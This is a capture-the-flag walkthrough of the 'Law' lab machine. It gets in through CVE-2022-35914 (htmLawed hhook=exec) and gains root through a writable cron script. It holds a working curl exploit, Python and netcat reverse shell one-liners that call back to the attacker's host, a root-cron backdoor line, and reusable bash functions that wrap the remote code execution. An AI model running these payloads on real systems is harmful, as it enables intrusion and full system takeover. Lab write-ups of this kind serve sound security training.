In this walkthrough we go through the Law room from Proving Grounds. The room is rated Intermediate on the platform and consists of exploiting CVE-2022-35914 in htmLawed 1.2.5 for initial access, followed by privilege escalation by abusing a cron job that runs a writable bash script as root. So, let's get started without any delay.
Machine Info:
| Field | Value |
|---|---|
| Title | Law |
| IP address | 192.168.197.190 |
| Difficulty | Intermediate |
| OS | Linux |
| Description | Law is an Intermediate Linux machine which is vulnerable to CVE-2022-35914, which leads to the initial foothold on the server. The privilege escalation abuses a cron job to get root via a writable bash script file. |
Enumeration:
- I started off with a regular aggressive nmap scan (-A) and found only two ports open: 22 (SSH, OpenSSH 8.4p1) and 80 (HTTP, Apache 2.4.56). Port 53/tcp shows as filtered. The vulners script output is mostly noise for this box; the useful detail is the http-title, which already names the application and its version.
```
$ sudo nmap -A 192.168.197.190
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-01 23:16 IST
Nmap scan report for 192.168.197.190
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:8.4p1:
|     PRION:CVE-2016-20012  5.0  https://vulners.com/prion/PRION:CVE-2016-20012
|     PRION:CVE-2021-28041  4.6  https://vulners.com/prion/PRION:CVE-2021-28041
|     CVE-2021-28041        4.6  https://vulners.com/cve/CVE-2021-28041
|     CVE-2021-41617        4.4  https://vulners.com/cve/CVE-2021-41617
|     PRION:CVE-2020-14145  4.3  https://vulners.com/prion/PRION:CVE-2020-14145
|     CVE-2020-14145        4.3  https://vulners.com/cve/CVE-2020-14145
|     CVE-2016-20012        4.3  https://vulners.com/cve/CVE-2016-20012
|     PRION:CVE-2021-41617  3.5  https://vulners.com/prion/PRION:CVE-2021-41617
|     PRION:CVE-2021-36368  2.6  https://vulners.com/prion/PRION:CVE-2021-36368
|_    CVE-2021-36368        2.6  https://vulners.com/cve/CVE-2021-36368
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: htmLawed (1.2.5) test
| vulners:
|   cpe:/a:apache:http_server:2.4.56:
|     OSV:BIT-2023-31122         6.4  https://vulners.com/osv/OSV:BIT-2023-31122
|     OSV:BIT-APACHE-2023-45802  5.0  https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
|     OSV:BIT-APACHE-2023-43622  5.0  https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
|     OSV:BIT-APACHE-2023-31122  5.0  https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
|     OSV:BIT-2023-45802         5.0  https://vulners.com/osv/OSV:BIT-2023-45802
|     OSV:BIT-2023-43622         5.0  https://vulners.com/osv/OSV:BIT-2023-43622
|     F7F6E599-CEF4-5E03-8E10-FE18C4101E38  5.0  https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38  *EXPLOIT*
|     E5C174E5-D6E8-56E0-8403-D287DE52EB3F  5.0  https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F  *EXPLOIT*
|     DB6E1BBD-08B1-574D-A351-7D6BB9898A4A  5.0  https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A  *EXPLOIT*
|     CVE-2023-43622             5.0  https://vulners.com/cve/CVE-2023-43622
|     CVE-2023-31122             5.0  https://vulners.com/cve/CVE-2023-31122
|     CNVD-2023-93320            5.0  https://vulners.com/cnvd/CNVD-2023-93320
|     C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B  5.0  https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B  *EXPLOIT*
|     BD3652A9-D066-57BA-9943-4E34970463B9  5.0  https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9  *EXPLOIT*
|     B0208442-6E17-5772-B12D-B5BE30FA5540  5.0  https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540  *EXPLOIT*
|     A820A056-9F91-5059-B0BC-8D92C7A31A52  5.0  https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52  *EXPLOIT*
|     9814661A-35A4-5DB7-BB25-A1040F365C81  5.0  https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81  *EXPLOIT*
|     5A864BCC-B490-5532-83AB-2E4109BB3C31  5.0  https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31  *EXPLOIT*
|     17C6AD2A-8469-56C8-BBBE-1764D0DF1680  5.0  https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680  *EXPLOIT*
|_    CVE-2023-45802             2.6  https://vulners.com/cve/CVE-2023-45802
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/1%OT=22%CT=1%CU=30749%PV=Y%DS=4%DC=T%G=Y%TM=65BBD93A
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10B%TI=Z%II=I%TS=A)OPS(O1=M5
OS:4EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O
OS:6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%D
OS:F=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T
OS:6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=CDE
OS:8%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   245.87 ms 192.168.45.1
2   245.83 ms 192.168.45.254
3   245.92 ms 192.168.251.1
4   246.02 ms 192.168.197.190

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.97 seconds
```
- Enumerating the web server on port 80 confirms what the http-title already showed: the htmLawed 1.2.5 test page is running there.
Initial Access:
CVE-2022-35914
- Searching for known exploits for this version turns up CVE-2022-35914, which gives code execution on the target. The bundled test page, /vendor/htmlawed/htmlawed/htmLawedTest.php, takes the name of a hook function from the hhook POST parameter, and htmLawed calls that function with the submitted text as its first argument; setting hhook=exec therefore runs whatever is in the text parameter as a shell command. The PoC sends the same sid value as both cookie and POST parameter, which the test page requires to match, and extracts the command output from the print_r-style "[n] => ..." lines in the response. The test page is a development artifact and has no place on a production install, which is the real fix. I replayed the exploit below inside a Burp Suite intercepted request in order to execute commands on the target.
Exploit: https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/POC_2022-35914.sh
```bash
curl -s -d 'sid=foo&hhook=exec&text=id' -b 'sid=foo' http://192.168.197.190/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\ \[[0-9]+\] =\>'| sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/'
```
- Next, URL-encode the Python reverse shell one-liner below (spaces become +) and use it as the text parameter of the same request. Start a netcat listener on the port used in the payload (the captured request below calls back to port 80, so the listener must be on 80); once the request executes on the target, the listener receives the connection back.
```
python3+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.214",4444));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);+os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
The full POST body as sent from Burp Suite:
```
sid=qaj8hc4pg37qu5e97m3i5r0p7l&hhook=exec&text=python3+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.214",80));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);+os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
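Hand-encoding the payload each time is error-prone, so here is the same CVE-2022-35914 request wrapped into reusable shell functions. This is an added example, not code from the original walkthrough or from the htmLawed project: the base URL is passed in as an argument, the test-page path is the one shown above, the LAW_TARGET environment variable and the function names are my own, and the response snippet used to exercise the parser is constructed.

```bash
#!/usr/bin/env bash
# Added example: CVE-2022-35914 (htmLawedTest.php hhook=exec) as reusable functions.
# Assumptions: $1 is the base URL (e.g. http://192.168.197.190) and the test page
# sits at the path used in the page's PoC. LAW_TARGET is a name chosen here.

HTMLAWED_TEST_PATH="/vendor/htmlawed/htmlawed/htmLawedTest.php"

# The response embeds the command output as print_r-style numbered lines,
# "    [n] => <line><br />" (this is exactly what the PoC's egrep|sed looks for).
# Reads HTML on stdin, prints one clean output line per entry.
htmlawed_parse_output() {
    grep -E ' \[[0-9]+\] => ' | sed -E 's|.* \[[0-9]+\] => (.*)<br />.*|\1|'
}

# Run one shell command through hhook=exec and print its output.
#   $1 = base URL, $2 = command, $3 = sid (any value; defaults to "foo")
# The same sid goes in the cookie and the POST body because the test page
# requires them to match. --data-urlencode takes care of quotes, spaces and '+'
# in the command, so no manual encoding is needed.
htmlawed_exec() {
    local base="$1" cmd="$2" sid="${3:-foo}"
    curl -s -b "sid=${sid}" \
        --data-urlencode "sid=${sid}" \
        --data-urlencode "hhook=exec" \
        --data-urlencode "text=${cmd}" \
        "${base}${HTMLAWED_TEST_PATH}" | htmlawed_parse_output
}

# Sanity check before sending a reverse shell: 0 if `id` output comes back, 1 otherwise.
htmlawed_check() {
    htmlawed_exec "$1" id | grep -q '^uid='
}

# Usage (only runs when LAW_TARGET is set, so the file can also be sourced):
#   LAW_TARGET=http://192.168.197.190 ./htmlawed_exec.sh
if [ -n "${LAW_TARGET:-}" ]; then
    if htmlawed_check "$LAW_TARGET"; then
        htmlawed_exec "$LAW_TARGET" "id; uname -a"
    else
        echo "target does not look vulnerable" >&2
        exit 1
    fi
fi
```

Once htmlawed_check succeeds, the reverse shell one-liner from the page can be passed to htmlawed_exec as the command string without any manual `+` encoding; the listener still has to be up before the request is sent.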
- Captured the local flag.
Privilege Escalation:
- In the working directory of the shell I found a bash script, cleanup.sh, that appeared to be run by root at regular intervals, i.e. from a cron job. Before relying on that, check that the file is writable by the current user and that a root cron entry (in /etc/crontab or /etc/cron.d) actually references it; a process monitor such as pspy shows jobs whose crontab is not readable.
- So I appended the line below to the script; when cron next runs it as root, the netcat binary connects back to my listener on port 4444, hopefully giving a shell as root. Note that -e exists only in netcat builds that support it (netcat-traditional, ncat); if the target ships a netcat without -e, a bash /dev/tcp reverse shell works as a substitute. Appending with >> keeps the script's original logic intact so the job does not visibly break.
```bash
echo 'nc 192.168.45.214 4444 -e /bin/bash' >> cleanup.sh
```
- The callback arrived as root, and I captured the root flag to mark the machine as complete.
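The walkthrough infers that cleanup.sh is run by root from cron; the helper below turns that inference into a check you can run from the low-privileged shell. It is an added example, not part of the original walkthrough: it scans crontab-format files (by default /etc/crontab and /etc/cron.d/*) for absolute paths that point at existing files the current user can write, and prints the matching cron lines so the user field is visible. The function names, the default file list and the sample crontab used to exercise it are my own constructions. Per-user crontabs under /var/spool/cron are normally unreadable to other users, so a job that lives there will not show up here.

```bash
#!/usr/bin/env bash
# Added example: find cron-driven scripts the current user can modify.
# Not from the original page; default paths and names are assumptions.

# $@ = crontab-format files to scan (defaults to the system locations).
# Prints "<crontab file>: <writable script>" per hit; returns 0 if any hit, 1 if none.
find_writable_cron_scripts() {
    local f path hits=0
    if [ $# -eq 0 ]; then
        set -- /etc/crontab /etc/cron.d/*
    fi
    for f in "$@"; do
        [ -r "$f" ] || continue
        # Drop comments, blank lines and VAR=value lines (e.g. SHELL=/bin/sh),
        # then keep every whitespace-separated token that is an absolute path.
        for path in $(grep -Ev '^[[:space:]]*(#|$|[A-Za-z_][A-Za-z0-9_]*=)' "$f" |
                      tr -s ' \t' '\n' | grep -E '^/' | sort -u); do
            # Only existing regular files the current user may write are interesting.
            if [ -f "$path" ] && [ -w "$path" ]; then
                printf '%s: %s\n' "$f" "$path"
                hits=$((hits + 1))
            fi
        done
    done
    [ "$hits" -gt 0 ]
}

# Show the full cron lines that reference a script, so the user field
# (system crontabs carry one) confirms whether it really runs as root.
#   $1 = script name or path, remaining args = crontab files (same default).
cron_lines_for() {
    local script="$1"; shift
    if [ $# -eq 0 ]; then
        set -- /etc/crontab /etc/cron.d/*
    fi
    grep -H -- "$script" "$@" 2>/dev/null
}

# Usage on the box (results depend on the host, so nothing is asserted here):
#   find_writable_cron_scripts && cron_lines_for cleanup.sh
```

A hit whose cron line names root in the user field is the precondition the page's privilege escalation relies on; no hit means either the job is defined somewhere unreadable (watch it with a process monitor instead) or the script is not actually writable, in which case appending to it will fail silently.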
Conclusion:
So that was "Law" for you. We started off with a regular nmap scan and found two ports open: 22 (SSH) and 80 (HTTP). Enumerating the web server on port 80 showed the htmLawed 1.2.5 test page. A search for known exploits showed it is vulnerable to CVE-2022-35914, which we used to get an initial foothold on the target. For privilege escalation, we abused a cron job running as root by appending a reverse shell one-liner to the scheduled bash script file, which eventually gave us root. On that note, I will take your leave and will meet you in the next one. Till then, "Happy hacking".